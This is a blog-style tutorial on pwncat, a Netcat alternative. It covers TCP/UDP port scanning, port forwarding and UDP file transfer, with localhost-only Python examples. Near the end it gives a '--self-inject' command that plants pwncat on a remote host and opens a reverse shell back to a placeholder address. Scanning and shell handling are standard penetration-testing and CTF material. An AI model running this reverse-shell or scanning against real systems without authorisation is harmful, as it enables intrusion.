INTRO

Netcat is often called the Swiss Army knife of hacking: with it you can open connections, listen on ports, and check which ports and services are reachable on any host. It is available for Linux, Windows and macOS as a small single binary, and it comes up often in CTF challenges.

Netcat gives you a simple command-line interface. There is even a Python library, nclib, that offers Netcat-like functionality from Python code; you can install it with this command:

pip install nclib

But is there an alternative to Netcat? Do we have to use it in every situation? Not at all: there is a tool named Pwncat. I think it is better than Netcat, although the choice is yours; Pwncat does have advantages of its own.

Pwncat has its own website (the theme is a little dark, I guess). Note that the name is shared with a different tool, Caleb Stewart's pwncat post-exploitation framework (published on PyPI as pwncat-cs); this post is about cytopia's pwncat, the Netcat replacement.

Pwncat is an open-source project, so you can easily contribute to it. Its documentation page lists every function Pwncat uses; the developer has organised it very well, so take a look at that.

ATTACK

To use Pwncat you first need to install it. On Linux, install it with pip by typing this command:

pip install pwncat

If you are on macOS, you can also install it with Homebrew. Type this command:

brew install pwncat

Once installed, run pwncat --help to confirm it works; if it is not installed you will get a "command not found" error instead of the usage text.

Pwncat's syntax is very similar to Netcat's. To connect to another host, type this command:

pwncat <host> <port>

If the host is unreachable, it prints a clear error message in red.

You can do a TCP port scan with Pwncat. Type this command:

pwncat -z <host> 1-1000

-z stands for zero-I/O mode: Pwncat completes the TCP three-way handshake with each port but sends no data and closes the connection straight away, so the result only tells you whether something is listening. 1-1000 is the range of ports to scan. Keep in mind that this is a full connect scan: every probe completes a handshake and shows up in the target's logs, so only run it against hosts you are authorised to test.

Not just TCP ports: you can scan UDP ports too by adding -u. UDP has no handshake, so a port that stays silent cannot be told apart from one that a firewall filters; only an ICMP port-unreachable reply proves a port closed, and a port is proven open only when the service answers the probe. Type this command:

pwncat -z <host> 1-1000 -u
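The following script is an added example written for this post, not pwncat's own code. It shows the mechanism behind zero-I/O mode for both the TCP and the UDP scans above: a TCP probe completes the handshake and sends nothing, a UDP probe can only prove "closed" through an ICMP port-unreachable reply. The TCP listener and UDP echo service are constructed here on 127.0.0.1 so it runs offline; the state labels ("open", "closed", "filtered", "open|filtered") are this script's own, not pwncat's output format.

```python
"""Zero-I/O port probing, the mechanism behind `pwncat -z` (and `nc -z`).

Added example, not pwncat's own code. Targets are constructed on 127.0.0.1.
"""
import socket
import threading


def tcp_zero_io(host, port, timeout=1.0):
    """Complete the TCP handshake, send nothing, close: that is all -z does."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return "open"            # SYN/SYN-ACK/ACK completed, zero bytes sent
    except ConnectionRefusedError:
        return "closed"              # target answered with RST
    except OSError:
        return "filtered"            # timeout or no route: dropped silently


def udp_zero_io(host, port, timeout=1.0):
    """UDP has no handshake: only an ICMP port-unreachable (surfacing as
    ECONNREFUSED on a connected UDP socket) proves 'closed'; silence means
    either a listening service that does not reply or a firewall drop."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.connect((host, port))
        try:
            s.send(b"\x00")
            s.recv(1)
            return "open"            # something replied
        except ConnectionRefusedError:
            return "closed"
        except socket.timeout:
            return "open|filtered"


def scan(host, ports, udp=False, timeout=1.0):
    """Probe each port in `ports` (any iterable, e.g. range(1, 1001))."""
    probe = udp_zero_io if udp else tcp_zero_io
    return {p: probe(host, p, timeout) for p in ports}


# --- constructed targets so the example is self-contained -------------------

def start_tcp_listener():
    """Bind an ephemeral TCP port and listen. Nothing ever calls accept():
    the kernel still completes the handshake into the backlog, which is why
    a zero-I/O probe reports 'open' without any application-level exchange."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    s.listen(5)
    return s, s.getsockname()[1]


def start_udp_echo():
    """A UDP service that answers every datagram it receives."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.bind(("127.0.0.1", 0))

    def serve():
        while True:
            try:
                data, peer = s.recvfrom(1024)
                s.sendto(data, peer)
            except OSError:
                return               # socket closed by the caller

    threading.Thread(target=serve, daemon=True).start()
    return s, s.getsockname()[1]


def free_port(udp=False):
    """A port nothing listens on: bind 0, note the number, release it."""
    kind = socket.SOCK_DGRAM if udp else socket.SOCK_STREAM
    with socket.socket(socket.AF_INET, kind) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    tcp_srv, tcp_port = start_tcp_listener()
    udp_srv, udp_port = start_udp_echo()
    print("tcp", scan("127.0.0.1", [tcp_port, free_port()]))
    print("udp", scan("127.0.0.1", [udp_port, free_port(udp=True)], udp=True))
    tcp_srv.close()
    udp_srv.close()
```

Run it and the TCP listener shows as open even though nothing ever accepts the connection, while the unbound UDP port only shows as closed because the loopback interface delivers the ICMP error; against a firewalled host the same probe would sit in "open|filtered".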

The feature I like most in this tool is port forwarding. You can forward any port, locally or remotely, to any host, and the syntax is very simple.

Local port forwarding lets you expose someone else's service on your own IP. One thing to know before trying it: a plain TCP forward rewrites nothing at the application layer, so a website that is only served by name (a virtual host that refuses requests addressed to its bare IP) will not work through the forward. You can simply test it against our website.

However, this is the syntax for Local Port Forwarding:

pwncat -L 0.0.0.0:<Local-Port> <Remote-Host> <Remote-Port>

This command makes the remote host's port available on your machine. Because it binds 0.0.0.0 it listens on every interface; use 127.0.0.1 instead if nobody else on the network should be able to reach the forwarded service.

There is an option for remote port forwarding too (-R), which works the other way round: a port that is open on your localhost is published on the remote host. The project documentation covers its exact syntax.

You can send and receive files with this tool over UDP as well. Remember that UDP gives you no ordering, delivery or end-of-file guarantee, so compare a checksum of both copies afterwards (sha256sum on each side) and prefer TCP (drop the -u) unless UDP is the only thing that gets through. Type these commands:

pwncat -u -l 1234 < upload.txt
pwncat -u localhost 1234 > download.txt
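To show what the bare UDP redirection above leaves out, here is an added example written for this post (not pwncat's own code): every datagram carries a sequence number, a final datagram carries the chunk count and a SHA-256 digest, and the receiver reports which chunks never arrived. The payload is constructed inline, and the drop parameter simulates datagram loss; the header layout and function names are this example's own.

```python
"""UDP file transfer with sequence numbers, an EOF marker and a SHA-256 check.

Added example, not pwncat's own code. Payload constructed inline.
"""
import hashlib
import socket
import struct

CHUNK = 1024
HDR = struct.Struct("!IH")           # seq (uint32), flags (uint16); flag 1 = final


def send_file(data, host, port, drop=()):
    """Send `data` as numbered datagrams followed by a final datagram that
    carries the total chunk count and the SHA-256 digest. Sequence numbers
    listed in `drop` are skipped to mimic loss. Returns datagrams sent."""
    chunks = [data[i:i + CHUNK] for i in range(0, len(data), CHUNK)] or [b""]
    sent = 0
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        for seq, chunk in enumerate(chunks):
            if seq in drop:
                continue             # simulated loss: this datagram never leaves
            s.sendto(HDR.pack(seq, 0) + chunk, (host, port))
            sent += 1
        s.sendto(HDR.pack(len(chunks), 1) + hashlib.sha256(data).digest(), (host, port))
    return sent + 1


def recv_file(sock, timeout=2.0):
    """Collect datagrams on a bound UDP socket until every chunk announced by
    the final marker has arrived, or `timeout` seconds pass with nothing new.
    Returns {'data': bytes or None, 'missing': [seq, ...], 'ok': bool}."""
    sock.settimeout(timeout)
    parts, total, digest = {}, None, None
    while total is None or any(i not in parts for i in range(total)):
        try:
            pkt, _ = sock.recvfrom(HDR.size + CHUNK)
        except socket.timeout:
            break                    # lost datagrams never show up; give up
        seq, flags = HDR.unpack_from(pkt)
        body = pkt[HDR.size:]
        if flags & 1:
            total, digest = seq, body
        else:
            parts[seq] = body        # out-of-order or duplicate is harmless
    if total is None:
        return {"data": None, "missing": [], "ok": False}
    missing = [i for i in range(total) if i not in parts]
    if missing:
        return {"data": None, "missing": missing, "ok": False}
    data = b"".join(parts[i] for i in range(total))
    return {"data": data, "missing": [],
            "ok": hashlib.sha256(data).digest() == digest}


def bind_receiver(host="127.0.0.1", port=0):
    """Bind a UDP socket (port 0 = ephemeral). Returns (socket, port)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.bind((host, port))
    return s, s.getsockname()[1]


if __name__ == "__main__":
    rx, rx_port = bind_receiver()
    payload = b"pwncat-udp-transfer-" * 300        # constructed, 6000 bytes
    send_file(payload, "127.0.0.1", rx_port)
    print("complete:", recv_file(rx)["ok"])
    send_file(payload, "127.0.0.1", rx_port, drop={3})
    print("with loss:", recv_file(rx, timeout=0.5)["missing"])
    rx.close()
```

With plain `pwncat -u ... > download.txt` none of this bookkeeping exists: a lost or reordered datagram silently corrupts the file, and the receiver has no way to know the transfer has finished other than the sender going quiet.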

There is one more feature that CTF players will appreciate. Have you ever lost a remote shell by accidentally pressing Ctrl-C? That makes me lose my temper sometimes. With Pwncat you can get an "unbreakable" shell: once the remote side connects, Pwncat injects a copy of itself on that host and starts it as a reverse shell back to the address you give. Type this command to start listening for the unbreakable shell:

pwncat -l <listening-Port> --self-inject /bin/bash:<Self-IP>:<Self-Port>

The command looks complicated, which is why the authors explain it in a YouTube video; watching that will teach you more than further explanation here.

Thanks For Visiting.
